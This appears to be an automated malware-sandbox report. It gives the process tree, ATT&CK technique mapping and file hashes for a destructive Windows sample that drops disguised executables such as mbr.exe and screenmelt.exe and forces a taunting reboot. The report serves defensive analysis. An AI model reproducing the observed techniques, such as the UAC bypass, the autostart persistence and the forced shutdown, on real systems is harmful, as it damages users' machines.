C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffce8da3cb8,0x7ffce8da3cc8,0x7ffce8da3cd84⤵
-
C:\Windows\system32\timeout.exetimeout /t 15 /nobreak3⤵
- Delays execution with timeout.exe
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.google.com/search?q=moskau+moskau3⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffce8da3cb8,0x7ffce8da3cc8,0x7ffce8da3cd84⤵
-
C:\Windows\system32\shutdown.exeshutdown /r /t 3 /c "id like to see you fix this lol"3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\PickerHost.exeC:\Windows\System32\PickerHost.exe -Embedding1⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x4 /state0:0xa3a3c855 /state1:0x41c64e6d1⤵
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Matrix ATT&CK v13
Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
1Disable or Modify Tools
1Modify Registry
3Hide Artifacts
2Hidden Files and Directories
2File and Directory Permissions Modification
2Windows File and Directory Permissions Modification
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.datFilesize
152B
MD58f2eb94e31cadfb6eb07e6bbe61ef7ae
SHA13f42b0d5a90408689e7f7941f8db72a67d5a2eab
SHA256d222c8e3b19cda2657629a486faf32962e016fc66561ce0d17010afdb283c9de
SHA5129f7f84149885b851e0bf7173c540e466a2b2eb9907d8b608f60360933328cc75d9d1b63640ea4ecc1e64ecc5dd7ee74d82903f96a8b4418ca56296641a8c0703
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.datFilesize
152B
MD5d56e8f308a28ac4183257a7950ab5c89
SHA1044969c58cef041a073c2d132fa66ccc1ee553fe
SHA2560bc24451c65457abc1e4e340be2f8faceae6b6ec7768a21d44bcd14636543bae
SHA512fd5798559f4025ec3408f5550b8671d394b1ec83b85fdac8c005b0cc3e183272bdd07db15a156a572c9c5e5798badf235dc10aae62a052efa8dd9dfdbdca8189
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
5KB
MD562ec395204e0aae9915a3b732f94082d
SHA1ad6020612c27b62c0e590459c4f36aaf2ed7c138
SHA256dd585d49302ad327220f0bd5d682f83498a501539a9ff1057f2a9c993ddc723b
SHA512430cafa8b002e2d6041c4ac74f8588f6436659a48fe063abbe6e38d440ed04ca795fd001a296b83bc9476c76feabd22dae4da8e557e468abbd909fa905e7717c
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENTFilesize
16B
MD546295cac801e5d4857d09837238a6394
SHA144e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA2560f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA5128969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENTFilesize
16B
MD5206702161f94c5cd39fadd03f4014d98
SHA1bd8bfc144fb5326d21bd1531523d9fb50e1b600a
SHA2561005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167
SHA5120af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local StateFilesize
8KB
MD501cae2936004d4a9e2099ae92bb8520c
SHA1980fa86f666537e848dfac4a7f76c3afa5255dd4
SHA256fae06ad03e25a3f2a2046556aa51c19f086bbef6ead452ff6330be346a07ccd6
SHA512e11bfe642e00f97b75b2cdad55452bd06ccbf3f94ff102ac79486eead74f6e5375695230eee14ff1ca3b21fa109319385964012dd2817812d412033a1e184d1c
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local StateFilesize
8KB
MD5fc60e2e1f4ebe524fc3ee72a6c9f68a4
SHA1e2e57f927c2e20b22151e40b4513f0e703dc0edf
SHA256ed7b39b8d905b6602f449271007e9fa5ce8cd4d4154d985d74c6772655d359ab
SHA5124c8a611d5104da9b99f5b815c3abaf1aacb44ca22ab0ee31fcdee6673a192e8da2f4523403fa9d1dacfb3c4b9a3e18b2282ff036ed04e44788432e81e851ac2a
-
C:\Users\Admin\AppData\Local\Temp\6234.tmp\6235.tmp\6236.batFilesize
4KB
MD54a79415752ab6e7d4706620f91e372b0
SHA1830c6d1a491031f57b7827dc23fdb3fb1b066dcb
SHA2567f4a90cb061298868b15088311358326bbf9762d738b0238f61fe6372d80d4a0
SHA512f0ea1c15e6f10e8ec012e9bd9ee4f2afc2b229ef508cd29ce498d44091ecdc14f13f34fe07ccae3f6e68c5a3da0b2202a94078d0b19cc159a82ef601a413c6b6
-
C:\Users\Admin\Downloads\user.bmpFilesize
7KB
MD5bce2c2fff9af8eb17db5fb8ec2f8468c
SHA1b509ac36b55378e6cb985b5b6361bc7e6ff09c64
SHA25663d356735b63778fdf39861fe03155e3766bcab0825074d72a540d1a309e12fe
SHA51222baf89fc7b249e3fad8ffdeb6a67316e0a28b8e9a2e10cccca0ab99c31a40e8c2836b876ce3501706196d2303b88b52cc29e107b894eb9d3b1addbedfaf8d68
-
C:\Users\Admin\downloads\colorcmd.exeFilesize
122KB
MD5f07ad62ffe36c3350f14186618dffea4
SHA101372c5536edd2c0ad51df9d3cf51237f122384f
SHA25631dee760b868645ad0f4e7270ec54942d01b1a7df769f04e52948b32e681a346
SHA5123302acab75c14295ab9aadde5d25d8ffc7795e1e15357614692489a6e0edf86d2f5e464917251834d27b3ad95f262d3bc3088479a957fe2bf691b1066ced6406
-
C:\Users\Admin\downloads\mbr.exeFilesize
47KB
MD58562ed46d745dceb3cc268693ca25c83
SHA1309067f0c9703084654495a47e67f7a40824700d
SHA256ea5d21e6598d52b30e9d055bc406c6227bbadb5c493addb27b32fb16a6dcae8c
SHA51252f23e70f7ea6eab1a50a4008e563d787732f7361dfe10c48f39dae42bce023c90449c9a903733fab13c49b50f8c4fa7d4864ab26c69326aab0149c765fd677b
-
C:\Users\Admin\downloads\mmc.exeFilesize
116KB
MD51568445f077482ac1d17a82403236a50
SHA1ab42cb00af4f08629c30af053325e0bc3332659b
SHA256584c00a54afbf23413fd3d39a06d07c0ae811965e5670ebc5d8abad70a594ce5
SHA51283941d9ec3e89d4301405800afc3140e3406cbf2d405e1fe886136ecb669375fcd9e2adfdfeb897c4603d8220db374e63444608accd8ba4ba3a7dbd7aac0d6ca
-
C:\Users\Admin\downloads\msiexec.exeFilesize
210KB
MD5a968951f4f6aeec3eb1aa67b82fdcee9
SHA152d40548aaed7604709f78da62f7c22810e05cf3
SHA25679b1ba6b9959dfe0289ff1182cf2ecb130f8568dd67a4fec6b6b8464dbfb4446
SHA512bba1caf8e2173a082e220eec1f1b5da880d39afca353cfafe8a7850d4a7d85e1ec0ff771bffb440afdc475eef50f9b720b5a3e9aea6c6cd2b3a8486a1681df3a
-
C:\Users\Admin\downloads\screenmelt.exeFilesize
116KB
MD5906a6d30ea07a63b252c21ff4e8cf785
SHA1cceae82b6a75838a038096cf8dd721369764e113
SHA2560850c8ca4e063475b6d83171b28eaaf1aec4452814a6c2e07acfc6f9df1d0359
SHA512dafb680429cfe5db8dc9528a3f515e1e9e18289c97bb6cbcf612934ba441d97a60392878ee3554bfa3f0ecc40b49f4db4fef6bc3895681d4fa8c563a1a43c334
-
C:\Users\Admin\downloads\taskmgr.exeFilesize
139KB
MD512c0b030ad5d135dce89d85becfdb76f
SHA1f8afc5bb441b54a0b4dcb66e158abd44187a43fe
SHA2568436fcc98e61ea958dd6adf346a81c5d08cb91e9d9a6cc67cacf4f1b14db13b9
SHA512710f39020f9e06d087d7ff55fe887203716a24080e368dbaa837421f8874fc35f0d39ac1634bfaa60d4fee4c93f4699872c725e63d759dfd81dc751a56ead61a
-
C:\Users\Admin\downloads\winnt64.exeFilesize
188KB
MD5aa992d93467882ff211f211495e6c545
SHA175a1a182af719168b9ca7b9c42282b997f82d443
SHA256dadd54e1c3b0496d3a49e112da7c3d71255037df9ba27b890131330b42eabf88
SHA51254d07b5f123b20128459de04694ed295275498c646fef596830c2c98ff1a8fa4741c95ce72be6d59a713fc6d7d7365c4f13eace2ed6bf357ebef44885b882d5d
-
C:\Users\Admin\downloads\winntcus64.pngFilesize
135KB
MD56630a0fb912cd00e64f2014401094beb
SHA1e869c10b7f664332a1274e6de8812d4dc21d1bdc
SHA2562b8c4658c0f5b47bab5f6ba1135d7d5a8d31414cf788b8fa7c4c520d1db92ba2
SHA5126c7b97f677d43d22b1a2d7a12421f7fbcf4bb0017647dab846052560c0b1792ee1cdc8220a29eec9f5ab6f23be51b2c375101353e2c2112c492f59c7a701af87
-
C:\Users\Public\Desktop\ISEEYOU6.prsnlzFilesize
73B
MD5f2c62761eaf03a1477f392a23a2b951d
SHA1243ae1c1ec3377cf835efb728180dfd19567d2f2
SHA256f033d117272cafc4072c2a9e6986381939f19eebe57d08be26834f752a9c4a18
SHA512d7eaf3915aadaf5b0d2cb7ca740b8bbd8ce93f809ebf39e92e4934c96d44020a631787aeec3e28c290a51c01c91a5044f3d4b679d8451fd8a1cdc871a5e47c27
-
\??\PIPE\lsarpcMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e